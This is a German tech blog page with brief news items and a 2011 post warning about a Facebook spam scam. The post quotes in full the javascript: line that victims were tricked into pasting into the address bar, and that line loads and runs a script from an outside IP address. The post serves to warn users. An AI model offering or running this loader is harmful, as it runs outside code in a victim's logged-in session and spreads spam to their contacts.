Der GEMA-Virus - Neue Variante des Ukash-Virus

Seit kurzem sind kusiert der GEMA-Virus, der ähnlich aufgebaut ist wie der BKA-Virus. Dieser Virus sperrt den befallenen PC komplett, so dass nicht mehr auf den Desktop zugegriffen werden kann.

iPad 4 - Apple geht neue Wege!

Das Apple iPad 2 ist erst noch frisch auf dem Markt, da gibt es schon wieder zahlreiche Gerüchte über einen potenziellen Tablet-Nachfolger. Die wichtigsten Gerüchte und Spekulationen rund um das Apple iPad ist immer wieder die natrüliche Neugierde der Menschen und die Geheimniskrämerei des Apple-Konzerns.

Apple ruft iPod zurück

Wer vor rund fünf Jahren einen iPod Nano bei Apple gekauft hat, kann sich womöglich bald über ein neues Exemplar des MP3-Players freuen. Wegen einer Fehlfunktion der internen Batterie ruft der Großkonzern Apple einen Teil der Serie zurück

Der Digitale Einbruch

Zwei 15 jährige in Bayern konnten jetzt als Datendiebe überführt werden. Sie stahlen virtuelle Gegenstände in einem Online-Rollenspiel um dadurch ihren Status zu verbessern.

Mittwoch, 20. April 2011

Facebook | XSS-Angriff?!? | Auf alle Fälle SPAM!

Seit kurzem erhalte ich von unterschiedlichen Freunden die bei Facebook gerade offline sind immer die gleichen Nachrichten.
VORNAME wow facebook kann dir jetzt anzeigen wer dein Profil ansieht! Schaus dir an @http://ow.ly/4DDVJ
Natürlich kommt man dann auf ihrgend eine komische Seite bei der man wieder irgendwas angeben muss! Achtung ihr macht das alle mit eurem Facebook-Login. Und der Seitenbetreiber bekommt jede Menge Daten über euch die ihr ihm sicherlich nicht mitteilen wollt!

Interessant ist auch wenn man sich die Seite hinter dem Link einmal nüchtern ansieht. Hier wird man aufgeforder sich bei Facebook anzumelden und dann ein Script in den Adressbereich des Browsers einzugeben...
Ja, schon ab hier kann man von XSS(Cross site scripting) sprechen. Es wird gezielt versucht Facebook zwischen verschieden Seitenaufrufen zu manipulieren. Hinter dem Code steckt nach meinen ersten Erkenntnissen nicht mehr, als dass bei einem Aufruf über die Chatfunktion von Facebook per zufall(Math.random()) immer mehr Leute(Freunde) dieser Link geschickt wird!!

Ein massives Spamscript also!


javascript:(function(){_ccscr=document.createElement('SCRIPT');_ccscr.type='text/javascript';_ccscr.src='http://216.24.202.125/invite.php?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

Was genau passiert kann man hier unter http://216.24.202.125/invite.php sehen.

mehr zum Thema:

- Auf T-Online "Facebook-Spam überrollt soziales Netzwerk